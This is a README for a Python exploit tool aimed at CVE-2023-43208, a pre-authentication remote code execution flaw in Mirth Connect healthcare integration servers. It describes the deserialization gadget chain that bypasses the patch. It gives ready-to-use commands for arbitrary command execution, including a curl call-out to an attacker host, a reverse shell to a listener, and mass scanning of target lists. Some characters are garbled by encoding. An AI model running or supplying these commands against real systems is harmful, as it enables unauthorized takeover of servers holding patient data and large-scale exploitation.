Share
## https://sploitus.com/exploit?id=84AFA095-B694-5F7E-A4BF-860A4BAD21FD
# CVE-2023-43208 โ Mirth Connect Pre-Auth RCE
Pre-authenticated Remote Code Execution in **NextGen Healthcare Mirth Connect **CVSS 9.8 (Critical)** โ Patch bypass of CVE-2023-37679
## Overview
Mirth Connect uses the Java XStream library to deserialize XML payloads on the `/api/users` endpoint **without authentication**. The original fix (CVE-2023-37679) introduced a denylist of dangerous classes, but this was bypassed using `EventBindingInvocationHandler` from Apache Commons Lang3 combined with the Commons Collections4 `InvokerTransformer` chain.
Fixed in Mirth Connect **4.4.1** by switching from denylist to allowlist.
## Requirements
```bash
pip install requests
```
Python 3.10+ (uses `match` statements).
## Usage
### Check if a target is vulnerable
```bash
python3 exploit.py check -t https://target:8443
```
### Execute a command (blind RCE โ no output)
```bash
python3 exploit.py exec -t https://target:8443 -c "id"
python3 exploit.py exec -t https://target:8443 -c "curl http://attacker/pwned"
```
### Pop a reverse shell
```bash
# Terminal 1 (or let the script handle the listener):
python3 exploit.py shell -t https://target:8443 --lhost 10.10.10.10 --lport 4444
# For better shell experience, use rlwrap:
rlwrap python3 exploit.py shell -t https://target:8443 --lhost 10.10.10.10 --lport 4444
```
### Scan multiple targets
```bash
python3 exploit.py scan -f targets.txt -o vulnerable.txt -T 30
```
## Attack Chain
```
POST /api/users (no auth)
โ
โผ
XStream deserializes XML payload
โ
โผ
sorted-set triggers Comparable.compareTo()
โ
โผ
dynamic-proxy โ EventBindingInvocationHandler (bypasses denylist)
โ
โผ
ChainedTransformer.transform()
โ
โผ
ConstantTransformer(Runtime.class)
โ InvokerTransformer("getRuntime")
โ InvokerTransformer("invoke")
โ InvokerTransformer("exec", )
โ
โผ
OS command execution as Mirth Connect service user
```
## Disclaimer
This tool is provided for **authorized security testing and educational purposes only**. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing.
## References
- [NVD โ CVE-2023-43208](https://nvd.nist.gov/vuln/detail/CVE-2023-43208)
- [Horizon3.ai โ Writeup](https://www.horizon3.ai/attack-research/disclosures/nextgen-mirth-connect-pre-auth-rce-cve-2023-43208/)
- [CISA KEV Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)